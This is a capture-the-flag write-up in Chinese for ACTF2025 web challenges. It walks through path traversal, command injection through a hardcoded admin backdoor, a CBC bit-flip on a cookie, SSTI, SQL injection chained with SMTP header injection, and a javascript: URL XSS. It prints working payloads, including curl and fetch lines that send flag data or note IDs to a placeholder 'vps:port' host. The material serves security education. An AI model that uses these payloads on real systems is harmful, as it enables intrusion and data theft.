ACTF2025 - Web writeup
ACTF2025 - Web writeup
ACTF upload
进去后是一个登录界面,输入用户名后登录,然后到一个文件上传的界面。
在 /upload?file_path= 处,可以实现任意文件读取,文件内容保存在 img 标签中的 base64 值中。
示例请求:
/upload?file_path=../../../../../../../../etc/passwd
继续读取:
/proc/self/cmdline
得知 app.py 路径,读源码:
import uuid
import os
import hashlib
import base64
from flask import Flask, request, redirect, url_for, flash, sessionapp = Flask(__name__)
app.secret_key = os.getenv('SECRET_KEY')@app.route('/')
def index():if session.get('username'):return redirect(url_for('upload'))else:return redirect(url_for('login'))@app.route('/login', methods=['POST', 'GET'])
def login():if request.method == 'POST':username = request.form['username']password = request.form['password']if username == 'admin':if hashlib.sha256(password.encode()).hexdigest() == '32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0': #backdoorsession['username'] = usernamereturn redirect(url_for('index'))else:flash('Invalid password')else:session['username'] = usernamereturn redirect(url_for('index'))else:return '''<h1>Login</h1><h2>No need to register.</h2><form action="/login" method="post"><label for="username">Username:</label><input type="text" id="username" name="username" required><br><label for="password">Password:</label><input type="password" id="password" name="password" required><br><input type="submit" value="Login"></form>'''@app.route('/upload', methods=['POST', 'GET'])
def upload():if not session.get('username'):return redirect(url_for('login'))if request.method == 'POST':f = request.files['file']file_path = str(uuid.uuid4()) + '_' + f.filenamef.save('./uploads/' + file_path)return redirect(f'/upload?file_path={file_path}')else:if not request.args.get('file_path'):return '''<h1>Upload Image</h1><form action="/upload" method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Upload"></form>'''else:file_path = './uploads/' + request.args.get('file_path')if session.get('username') != 'admin':with open(file_path, 'rb') as f:content = f.read()b64 = base64.b64encode(content)return f'<img src="data:image/png;base64,{b64.decode()}" alt="Uploaded Image">'else:os.system(f'base64 {file_path} > /tmp/{file_path}.b64')# with open(f'/tmp/{file_path}.b64', 'r') as f:# return f'<img src="data:image/png;base64,{f.read()}" alt="Uploaded Image">'return 'Sorry, but you are not allowed to view this image.'if __name__ == '__main__':app.run(host='0.0.0.0', port=5000)
/upload 接口处,如果验证登录名为 admin 就可以进入 os.system 命令执行。
/login 接口处,如果账号为 admin,密码为 backdoor(md5 值为 32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0)即可登录 admin 账户。
admin 登录后,访问:
/upload?file_path=`ls / > /tmp/1.txt`
将 ls / 的内容写入 /tmp/1.txt
再访问:
/upload?file_path=../../../../../../../../tmp/1.txt
发现有个 Fl4g_is_H3r3
再访问:
/upload?file_path=../../../../../../../../Fl4g_is_H3r3
把 base64 的值解码即得到 flag
not so web 1
一进去是 Base64 编码的字符串,解密后是源代码。
代码审计发现可以先使用 CBC 翻转攻击 修改用户名,然后利用 SSTI 漏洞。
我们注册账号如下:
- 用户名:
zdmin - 密码:
123456
然后复制 Cookie 并解密:
import base64
import binasciicookie = "wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG"
decoded_data = base64.b64decode(cookie)iv = decoded_data[:16]
encrypted = decoded_data[16:]
print(decoded_data)
print(decoded_data.hex())
print("IV (hex):", iv.hex())
print("Encrypted (hex):", encrypted.hex())
运行脚本得到:
c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
IV (hex): c3 03 1d a4 51 a8 d0 b5 90 68 fb 07f2cd8388
Encrypted (hex): ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
根据本地尝试数据:
{"name": "zdmin", "password_raw": "123456", "register_time": 1745636131}
应该在第 11 字节处将 z 改为 a,变为 admin。
执行异或计算:
cipher_11_hex = "fb"
cipher_11_dec = int(cipher_11_hex, 16) # 转为十进制
print(cipher_11_dec)# 计算异或结果
result_dec = cipher_11_dec ^ ord('z') ^ ord('a')
result_hex = hex(result_dec)# 输出结果
print(f"cipher[11] (hex): 0x{cipher_11_hex}")
print(f"ord('z'): {ord('z')} (0x{ord('z'):02x})")
print(f"ord('a'): {ord('a')} (0x{ord('a'):02x})")
print(f"Result (decimal): {result_dec}")
print(f"Result (hex): {result_hex}")
print(f"Result as char: {chr(result_dec)}")
重新构造并输出新的 Cookie:
a = "c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186"
a_bytes = binascii.unhexlify(a) # 转为 bytes
b = base64.b64encode(a_bytes).decode() # Base64 编码并转为字符串
print(b)
对比发现修改了一个字节:
原 Cookie:
wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG修改后:
wwMdpFGo0LWQaOAH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG
之后触发 SSTI 漏洞:
?payload={{url_for.__globals__.os.popen("cat flag.txt").read()}}
以下是你提供内容的纯格式整理版 Markdown,仅调整结构与格式,未增删任何原始信息:
not so web 2
发现 parse_cookie 函数的问题,验签函数核心在于:
PKCS1_v1_5.new(public_key).verify(msg_hash, sig)
但查看文档得知:
也就是说,如果签名有效,方法正常返回;如果签名无效,方法会抛出
ValueError或TypeError异常。
因此,该函数并没有实际的验签逻辑,只是判断签名是否有效。
我们只需要将用户名改为 admin 并保证签名有效即可通过验证,之后仍然可以触发 SSTI 漏洞。
Payload 1:
{{ lipsum["\x5f\x5fglobals\x5f\x5f"].os.popen("ls").read() }}
Payload 2:
{{ lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag.txt")|attr("read")() }}
Excellent-Site
题目描述
127.0.0.1 ezmail.org(意思是配置了hosts)
附件如下:
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *app = Flask(__name__)def get_subjects(username, password):imap_server = "ezmail.org"imap_port = 143try:mail = imaplib.IMAP4(imap_server, imap_port)mail.login(username, password)mail.select("inbox")status, messages = mail.search(None, 'FROM "admin@ezmail.org"')if status != "OK":return ""subject = ""latest_email = messages[0].split()[-1]status, msg_data = mail.fetch(latest_email, "(RFC822)")for response_part in msg_data:if isinstance(response_part, tuple):msg = email.message_from_bytes(response_part[1])subject, encoding = decode_header(msg["Subject"])[0]if isinstance(subject, bytes):subject = subject.decode(encoding if encoding else 'utf-8')mail.logout()return subjectexcept:return "ERROR"def fetch_page_content(url):try:parsed_url = urlparse(url)if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':return "SSRF Attack!"response = requests.get(url)if response.status_code == 200:return response.textelse:return "ERROR"except:return "ERROR"@app.route("/report", methods=["GET", "POST"])
def report():message = ""if request.method == "POST":url = request.form["url"]content = request.form["content"]smtplib._quote_periods = lambda x: xmail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""try:server = smtplib.SMTP("ezmail.org")mail_content = smtplib._fix_eols(mail_content)mail_content = mail_content.format(url=url, content=content)server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)message = "Submitted! Now wait till the end of the world."except:message = "Send FAILED"return render_template("report.html", message=message)@app.route("/bot", methods=["GET"])
def bot():requests.get("http://ezmail.org:3000/admin")return "The admin is checking your advice(maybe)"@app.route("/admin", methods=["GET"])
def admin():ip = request.remote_addrif ip != "127.0.0.1":return "Forbidden IP"subject = get_subjects("admin", "p@ssword")if subject.startswith("http://ezmail.org"):page_content = fetch_page_content(subject)return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")return ""@app.route("/news", methods=["GET"])
def news():news_id = request.args.get("id")if not news_id:news_id = 1conn = sqlite3.connect("news.db")cursor = conn.cursor()cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")result = cursor.fetchone()conn.close()if not result:return "Page not found.", 404return result[0]@app.route("/")
def index():return render_template("index.html")if __name__ == "__main__":app.run(host="0.0.0.0", port=3000)
/news 这里有 SQL 注入,sqlmap跑了一遍,数据库里没有什么有效信息。
一开始,思路主要集中在绕过waf上,但后来才想出来这里的每一个接口都是有用的:
1、通过/news可以构造返回值为任意字符,进而构造SSTI payload(从而绕过了fetch_page_content函数)
http://ezmail.org:3000/news?id=-1 UNION SELECT '{{lipsum.__globals__.os.popen("cat /flag > app.py").read()}}'
2、将构造好的payload在/report接口出以url参数替换SMTP协议部分的subject部分(payload中还需要用Resent-From头来绕过发件人为admin@ezmail.org这个限制)
3、访问/bot触发SSTI,命令执行
为了正确地处理邮件的收发,我们还需要在本地搭建一个邮件服务器:
# 使用 Docker 快速部署邮件服务器
docker run -d --name ctfmail4 \-p 25:25 \-e SMTP_SERVER=ezmail.org \-e SMTP_USERNAME=admin@ezmail.org \-e SMTP_PASSWORD='p@ssword' \-e SERVER_HOSTNAME=mail.ezmail.org \juanluisbaptiste/postfix:latest
改造后的app.py,便于本地测试
import logging
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *app = Flask(__name__)
# app.logger.setLevel(logging.DEBUG)def get_subjects(username, password):imap_server = "ezmail.org"imap_port = 143try:mail = imaplib.IMAP4(imap_server, imap_port)mail.login(username, password)mail.select("inbox")status, messages = mail.search(None, 'FROM "admin@ezmail.org"')if status != "OK":return ""subject = ""latest_email = messages[0].split()[-1]status, msg_data = mail.fetch(latest_email, "(RFC822)")for response_part in msg_data:if isinstance(response_part, tuple):msg = email.message_from_bytes(response_part [1])subject, encoding = decode_header(msg["Subject"]) [0]if isinstance(subject, bytes):subject = subject.decode(encoding if encoding else 'utf-8')mail.logout()return subjectexcept:return "ERROR"#解析url,当url满足 http & hostname=ezmail.org时,访问url,返回网页内容
def fetch_page_content(url):try:parsed_url = urlparse(url)if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':return "SSRF Attack!"response = requests.get(url)if response.status_code == 200:return response.textelse:return "ERROR"except:return "ERROR"@app.route("/admin", methods=["GET"])
def admin():print('admin1')ip = request.remote_addrif ip != "127.0.0.1":return "Forbidden IP"subject = get_subjects("admin", "p@ssword")if subject.startswith("http://ezmail.org"):page_content = fetch_page_content(subject)return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")return ""@app.route("/ssti", methods=["GET"])
def admin1():page_content = request.args.get("c")return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")@app.route("/report", methods=["GET", "POST"])
def report():message = ""if request.method == "POST":url = request.form["url"]content = request.form["content"]smtplib._quote_periods = lambda x: xmail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""try:server = smtplib.SMTP("localhost", 1026)mail_content = smtplib._fix_eols(mail_content)mail_content = mail_content.format(url=url, content=content)print(f"mail_content is : {mail_content}")server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)return mail_contentmessage = "Submitted! Now wait till the end of the world."except:message = "Send FAILED"return render_template("report.html", message=message)@app.route("/bot", methods=["GET"])
def bot():requests.get("http://ezmail.org:3000/admin")return "The admin is checking your advice(maybe)"@app.route("/test", methods=["POST"])
def fetch_page_contentTEST():url = request.form.get("url", "")print(f"[DEBUG] 收到的URL: {url}")try:parsed_url = urlparse(url)print(f"[DEBUG] 解析后的URL: {parsed_url}")print(f"[DEBUG] Scheme: {parsed_url.scheme}")print(f"[DEBUG] Hostname: {parsed_url.hostname}")if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':print("[DEBUG] URL检测不通过,返回SSRF Attack!")return "SSRF Attack!"print(f"[DEBUG] 发送请求到: {url}")response = requests.get(url)print(f"[DEBUG] 返回状态码: {response.status_code}")if response.status_code == 200:print("[DEBUG] 成功拿到网页内容")return response.textelse:print("[DEBUG] 请求失败,状态码非200")return "ERROR"except Exception as e:print(f"[DEBUG] 出现异常: {e}")return "ERROR"#数据库查询
@app.route("/news", methods=["GET"])
def news():# return '123444'news_id = request.args.get("id")if not news_id:news_id = 1conn = sqlite3.connect("news.db")cursor = conn.cursor()cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")result = cursor.fetchone()conn.close()if not result:return "Page not found.", 404return result[0]@app.route("/")
def index():return render_template("index.html")if __name__ == "__main__":app.run(host="0.0.0.0", port=3000,debug=True)最后的payload如下:
(注意payload中的端口3000,十分致命)
import time
import requestsurl = "题目地址"# SSTI Payload
payload = "{{lipsum.__globals__.os.popen(\"curl%20http://vps:port/`cat /flag|base64`\").read()}}"
# 邮件头注入
subject = f"http://ezmail.org:3000/news?id=-1 UNION SELECT '{payload}'\r\nFrom: admin@ezmail.org\r\nResent-From: admin@ezmail.org"data = {"url": subject, "content": ""}
res_1 = requests.post(f"{url}/report", data=data)
res_2 = requests.get(f"{url}/bot")print('done.')
eznote
js伪协议
app.js
const express = require('express')
const session = require('express-session')
const { randomBytes } = require('crypto')
const fs = require('fs')
const spawn = require('child_process')
const path = require('path')
const { visit } = require('./bot')
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');const DOMPurify = createDOMPurify(new JSDOM('').window);const LISTEN_PORT = 3000
const LISTEN_HOST = '0.0.0.0'const app = express()app.set('views', './views')
app.set('view engine', 'html')
app.engine('html', require('ejs').renderFile)app.use(express.urlencoded({ extended: true }))app.use(session({secret: randomBytes(4).toString('hex'),saveUninitialized: true,resave: true,}))app.use((req, res, next) => {if (!req.session.notes) {req.session.notes = []}next()
})const notes = new Map()setInterval(() => { notes.clear() }, 60 * 1000);function toHtml(source, format){if (format == undefined) {format = 'markdown'}let tmpfile = path.join('notes', randomBytes(4).toString('hex'))fs.writeFileSync(tmpfile, source)let res = spawn.execSync(`pandoc -f ${format} ${tmpfile}`).toString()// fs.unlinkSync(tmpfile)return DOMPurify.sanitize(res)
}app.get('/ping', (req, res) => {res.send('pong')
})app.get('/', (req, res) => {res.render('index', { notes: req.session.notes })
})app.get('/notes', (req, res) => {res.send(req.session.notes)
})app.get('/note/:noteId', (req, res) => {let { noteId } = req.paramsif(!notes.has(noteId)){res.send('no such note')return} let note = notes.get(noteId)res.render('note', note)
})app.post('/note', (req, res) => {let noteId = randomBytes(8).toString('hex')let { title, content, format } = req.bodyif (!/^[0-9a-zA-Z]{1,10}$/.test(format)) {res.send("illegal format!!!")return}notes.set(noteId, {title: title,content: toHtml(content, format)})req.session.notes.push(noteId)res.send(noteId)
})app.get('/report', (req, res) => {res.render('report')
})app.post('/report', async (req, res) => {let { url } = req.bodytry {await visit(url)res.send('success')} catch (err) {console.log(err)res.send('error')}
})app.listen(LISTEN_PORT, LISTEN_HOST, () => {console.log(`listening on ${LISTEN_HOST}:${LISTEN_PORT}`)
})bot.js
const puppeteer = require('puppeteer')
const process = require('process')
const fs = require('fs')const FLAG = (() => {let flag = 'flag{test}'if (fs.existsSync('flag.txt')){flag = fs.readFileSync('flag.txt').toString()fs.unlinkSync('flag.txt')} return flag
})()const HEADLESS = !!(process.env.PROD ?? false)const sleep = (sec) => new Promise(r => setTimeout(r, sec * 1000))async function visit(url) {let browser = await puppeteer.launch({headless: HEADLESS,// executablePath: '/usr/bin/chromium',args: ['--no-sandbox'],})let page = await browser.newPage()await page.goto('http://localhost:3000/')await page.waitForSelector('#title')await page.type('#title', 'flag', {delay: 100})await page.type('#content', FLAG, {delay: 100})await page.click('#submit', {delay: 100})await sleep(3)console.log('visiting %s', url)await page.goto(url)await sleep(30)await browser.close()
}module.exports = {visit
}flag在bot.js的visit函数中作为content的值回显
async function visit(url) {let browser = await puppeteer.launch({headless: HEADLESS,// executablePath: '/usr/bin/chromium',args: ['--no-sandbox'],})let page = await browser.newPage()await page.goto('http://localhost:3000/')await page.waitForSelector('#title')await page.type('#title', 'flag', {delay: 100})await page.type('#content', FLAG, {delay: 100})await page.click('#submit', {delay: 100})await sleep(3)console.log('visiting %s', url)await page.goto(url)await sleep(30)await browser.close()
}
而app.js中的/report接口调用了visit函数,
app.post('/report', async (req, res) => {let { url } = req.bodytry {await visit(url)res.send('success')} catch (err) {console.log(err)res.send('error')}
})
逻辑:访问/report接口,服务器会先提交一份包含flag的笔记(但笔记对应的noteid未知),然后访问传入的url。
只要获取到对应的noteid,就获取到了flag
可以在 /report 中提交url 参数,利用javascript伪协议,通过 xss 访问/notes接口,获得 bot 的 noteId ,从而获得 flag
payload:
javascript:fetch('/notes').then(r=>r.text()).then(d=>{new Image().src='http://vps:port/?data='+encodeURIComponent(d)})